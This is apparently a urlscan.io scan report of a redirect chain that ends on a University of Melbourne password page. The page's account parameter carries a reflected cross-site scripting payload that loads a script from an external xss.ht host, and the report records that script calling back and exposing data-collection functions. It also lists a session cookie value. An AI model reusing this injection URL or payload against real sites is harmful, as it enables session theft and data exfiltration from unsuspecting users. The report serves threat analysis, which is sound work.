urlscan.io logo urlscan.io
SecurityTrails logo

cyberkey-web.unimelb.edu.au Open in urlscan Pro
128.250.83.171  Public Scan

Go To Rescan Add Verdict Report
Submitted URL: https://elgumso.com/los_sombreros_gris.html
Effective URL: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script...
Submission: On May 12 via manual from AU — Scanned from DE
 Behaviour Indicators
Similar DOM Content API
Verdicts

Summary

This website contacted 4 IPs in 2 countries across 3 domains to perform 9 HTTP transactions. The main IP is 128.250.83.171, located in Melbourne, Australia and belongs to UNIMELB-AS-AP The University of Melbourne, Melbourne, Victoria, AU. The main domain is cyberkey-web.unimelb.edu.au.
TLS certificate: Issued by DigiCert TLS RSA SHA256 2020 CA1 on February 7th 2022. Valid for: a year.
This is the only time cyberkey-web.unimelb.edu.au was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

IP Address AS Autonomous System
1 2 3.15.80.134 16509 (AMAZON-02)
3 128.250.83.171 10148 (UNIMELB-A...)
2 52.70.162.23 14618 (AMAZON-AES)
9 4
Apex Domain
Subdomains		 Transfer
3 unimelb.edu.au
cyberkey-web.unimelb.edu.au
2 KB
2 xss.ht
lgmso.xss.ht
452 KB
2 elgumso.com
elgumso.com
www.elgumso.com
839 B
9 3
Domain Requested by
3 cyberkey-web.unimelb.edu.au cyberkey-web.unimelb.edu.au
lgmso.xss.ht
2 lgmso.xss.ht cyberkey-web.unimelb.edu.au
lgmso.xss.ht
1 www.elgumso.com
1 elgumso.com 1 redirects
9 4

This site contains no links.

Subject Issuer Validity Valid
elgumso.com
R3		 2022-03-18 -
2022-06-16		 3 months crt.sh
cyberkey-web.unimelb.edu.au
DigiCert TLS RSA SHA256 2020 CA1		 2022-02-07 -
2023-02-06		 a year crt.sh
*.xss.ht
AlphaSSL CA - SHA256 - G2		 2022-04-24 -
2023-05-26		 a year crt.sh

This page contains 2 frames:

Primary Page: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C
Frame ID: BBEB3578A154FE0A14DF5EF43BD1E848
Requests: 9 HTTP requests in this frame

Frame: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/default.css
Frame ID: 0907D08EE162E89BD9A117620C81315F
Requests: 1 HTTP requests in this frame

Screenshot
Live screenshot
Full Image

Page Title

Welcome

Page URL History Show full URLs

  1. https://elgumso.com/los_sombreros_gris.html HTTP 301
    https://www.elgumso.com/los_sombreros_gris.html Page URL
  2. https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso... Page URL

Page Statistics

9
Requests

67 %
HTTPS

0 %
IPv6

3
Domains

4
Subdomains

4
IPs

2
Countries

455 kB
Transfer

453 kB
Size

1
Cookies

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

  1. https://elgumso.com/los_sombreros_gris.html HTTP 301
    https://www.elgumso.com/los_sombreros_gris.html Page URL
  2. https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

Request Chain 0
  • https://elgumso.com/los_sombreros_gris.html HTTP 301
  • https://www.elgumso.com/los_sombreros_gris.html

9 HTTP transactions

Resource
Path		 Size
x-fer		 Type
MIME-Type
los_sombreros_gris.html
www.elgumso.com/
Redirect Chain
  • https://elgumso.com/los_sombreros_gris.html
  • https://www.elgumso.com/los_sombreros_gris.html
266 B
555 B 		Document
General
Check archive.org
Download Go to
Full URL
https://www.elgumso.com/los_sombreros_gris.html
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_128_GCM
Server
3.15.80.134 Columbus, United States, ASN16509 (AMAZON-02, US),
Reverse DNS
ec2-3-15-80-134.us-east-2.compute.amazonaws.com
Software
Apache/2.4.46 (Ubuntu) /
Resource Hash
93b1172b199635853266c051c5dd1d138ce293c99a453ad029fe57bb10fa9698

Request headers

Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
accept-language
de-DE,de;q=0.9

Response headers

Accept-Ranges
bytes
Connection
Keep-Alive
Content-Encoding
gzip
Content-Length
218
Content-Type
text/html
Date
Thu, 12 May 2022 06:06:43 GMT
ETag
"10a-5deca3df7c54d-gzip"
Keep-Alive
timeout=5, max=100
Last-Modified
Thu, 12 May 2022 05:58:07 GMT
Server
Apache/2.4.46 (Ubuntu)
Vary
Accept-Encoding

Redirect headers

Connection
Keep-Alive
Content-Length
333
Content-Type
text/html; charset=iso-8859-1
Date
Thu, 12 May 2022 06:06:43 GMT
Keep-Alive
timeout=5, max=100
Location
https://www.elgumso.com/los_sombreros_gris.html
Server
Apache/2.4.46 (Ubuntu)
Primary Request Password.do
cyberkey-web.unimelb.edu.au/CyberAuditWeb/mobile/ 		982 B
1 KB 		Document
General
Check archive.org
Download Go to
Full URL
https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_256_GCM
Server
128.250.83.171 Melbourne, Australia, ASN10148 (UNIMELB-AS-AP The University of Melbourne, Melbourne, Victoria, AU),
Reverse DNS
sec-srv-eka-vm.pb.unimelb.edu.au
Software
nginx /
Resource Hash
f8dd17b916858f476658f024b7537fc0b37482ccc8f919abbe1fdf525716e973
Security Headers
Name Value
X-Content-Type-Options nosniff
X-Frame-Options DENY

Request headers

Referer
https://www.elgumso.com/
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
accept-language
de-DE,de;q=0.9

Response headers

Connection
keep-alive
Content-Length
982
Content-Type
text/html;charset=UTF-8
Date
Thu, 12 May 2022 06:06:34 GMT
Server
nginx
X-Content-Type-Options
nosniff
X-Frame-Options
DENY
default.css
cyberkey-web.unimelb.edu.au/CyberAuditWeb/mobile/ 		191 B
461 B 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/default.css
Requested by
Host: cyberkey-web.unimelb.edu.au
URL: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_256_GCM
Server
128.250.83.171 Melbourne, Australia, ASN10148 (UNIMELB-AS-AP The University of Melbourne, Melbourne, Victoria, AU),
Reverse DNS
sec-srv-eka-vm.pb.unimelb.edu.au
Software
nginx /
Resource Hash
62c1258ef7b635abe60e8c151f08ebaa5300eaacd85ad84640ffdb24cd1164e9
Security Headers
Name Value
X-Content-Type-Options nosniff

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36

Response headers

Date
Thu, 12 May 2022 06:06:35 GMT
X-Content-Type-Options
nosniff
Last-Modified
Tue, 09 Oct 2018 02:21:48 GMT
Server
nginx
ETag
W/"191-1539051708000"
Content-Type
text/css
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
191
/
lgmso.xss.ht/ 		451 KB
452 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://lgmso.xss.ht/
Requested by
Host: cyberkey-web.unimelb.edu.au
URL: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_256_GCM
Server
52.70.162.23 Ashburn, United States, ASN14618 (AMAZON-AES, US),
Reverse DNS
ec2-52-70-162-23.compute-1.amazonaws.com
Software
nginx/1.14.0 (Ubuntu) /
Resource Hash
7d8184041fc1d90491cb20698cf6249228b257718099b0c5f8e2429674e0c4f5
Security Headers
Name Value
Content-Security-Policy default-src 'self'
Strict-Transport-Security max-age=31536000; includeSubDomains; preload
X-Content-Type-Options nosniff
X-Frame-Options deny
X-Xss-Protection 1; mode=block

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://cyberkey-web.unimelb.edu.au:8443/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36

Response headers

Content-Security-Policy
default-src 'self'
X-Content-Type-Options
nosniff
Connection
keep-alive
Content-Length
461702
X-Xss-Protection
1; mode=block
Pragma
no-cache
Server
nginx/1.14.0 (Ubuntu)
X-Frame-Options
deny
Date
Thu, 12 May 2022 06:06:46 GMT
Strict-Transport-Security
max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Methods
OPTIONS, PUT, DELETE, POST, GET
Content-Type
application/x-javascript
Access-Control-Allow-Origin
*
Cache-Control
no-cache, no-store, must-revalidate
Access-Control-Allow-Credentials
true
Access-Control-Allow-Headers
X-Requested-With, Content-Type, Origin, Authorization, Accept, Accept-Encoding
Expires
0
default.css
cyberkey-web.unimelb.edu.au/CyberAuditWeb/mobile/ Frame 0907 		191 B
461 B 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/default.css
Requested by
Host: lgmso.xss.ht
URL: https://lgmso.xss.ht/
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_256_GCM
Server
128.250.83.171 Melbourne, Australia, ASN10148 (UNIMELB-AS-AP The University of Melbourne, Melbourne, Victoria, AU),
Reverse DNS
sec-srv-eka-vm.pb.unimelb.edu.au
Software
nginx /
Resource Hash
62c1258ef7b635abe60e8c151f08ebaa5300eaacd85ad84640ffdb24cd1164e9
Security Headers
Name Value
X-Content-Type-Options nosniff

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36

Response headers

Date
Thu, 12 May 2022 06:06:35 GMT
X-Content-Type-Options
nosniff
Last-Modified
Tue, 09 Oct 2018 02:21:48 GMT
Server
nginx
ETag
W/"191-1539051708000"
Content-Type
text/css
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
191
truncated
/ 		42 B
0 		Image
General
Check archive.org
Download Go to Show image
Full URL
data:truncated
Protocol
DATA
Server
-, , ASN (),
Reverse DNS
Software
/
Resource Hash
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629

Request headers

accept-language
de-DE,de;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36

Response headers

Content-Type
image/gif
js_callback
lgmso.xss.ht/ 		2 B
637 B 		XHR
General
Check archive.org
Download Go to
Full URL
https://lgmso.xss.ht/js_callback
Requested by
Host: lgmso.xss.ht
URL: https://lgmso.xss.ht/
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_256_GCM
Server
52.70.162.23 Ashburn, United States, ASN14618 (AMAZON-AES, US),
Reverse DNS
ec2-52-70-162-23.compute-1.amazonaws.com
Software
nginx/1.14.0 (Ubuntu) /
Resource Hash
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
Security Headers
Name Value
Content-Security-Policy default-src 'self'
Strict-Transport-Security max-age=31536000; includeSubDomains; preload
X-Content-Type-Options nosniff
X-Frame-Options deny
X-Xss-Protection 1; mode=block

Request headers

Referer
https://cyberkey-web.unimelb.edu.au:8443/
accept-language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Content-type
text/plain

Response headers

Content-Security-Policy
default-src 'self'
X-Content-Type-Options
nosniff
Connection
keep-alive
Content-Length
2
X-Xss-Protection
1; mode=block
Pragma
no-cache
Server
nginx/1.14.0 (Ubuntu)
X-Frame-Options
deny
Date
Thu, 12 May 2022 06:06:48 GMT
Strict-Transport-Security
max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Methods
POST, GET, HEAD, OPTIONS
Content-Type
application/x-javascript
Access-Control-Allow-Origin
*
Cache-Control
no-cache, no-store, must-revalidate
Access-Control-Allow-Credentials
true
Access-Control-Allow-Headers
X-Requested-With
Expires
0
crossdomain.xml
cyberkey-web.unimelb.edu.au/ 		0
0
clientaccesspolicy.xml
cyberkey-web.unimelb.edu.au/ 		0
0
robots.txt
cyberkey-web.unimelb.edu.au/ 		0
0

Failed requests

These URLs were requested, but there was no response received. You will also see them in the list above.

Domain
cyberkey-web.unimelb.edu.au
URL
https://cyberkey-web.unimelb.edu.au/crossdomain.xml
Domain
cyberkey-web.unimelb.edu.au
URL
https://cyberkey-web.unimelb.edu.au/clientaccesspolicy.xml
Domain
cyberkey-web.unimelb.edu.au
URL
https://cyberkey-web.unimelb.edu.au/robots.txt

Verdicts & Comments Add Verdict or Comment

22 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

object| oncontextlost object| oncontextrestored function| structuredClone function| getScreenDetails string| pgp_key string| pgp_email_template string| chainload_uri object| collect_page_list function| generate_pgp_encrypted_email function| get_guid function| never_null function| contact_mothership function| send_collected_page function| collect_page_data function| collect_pages function| eval_remote_source function| addEvent function| hook_load_if_not_ready function| finishing_moves function| html2canvas object| openpgp object| probe_return_data

1 Cookies

Domain/Path Name / Value
cyberkey-web.unimelb.edu.au/CyberAuditWeb Name: JSESSIONID
Value: D90D7A1CCDAA3D01245CF354BB303B2C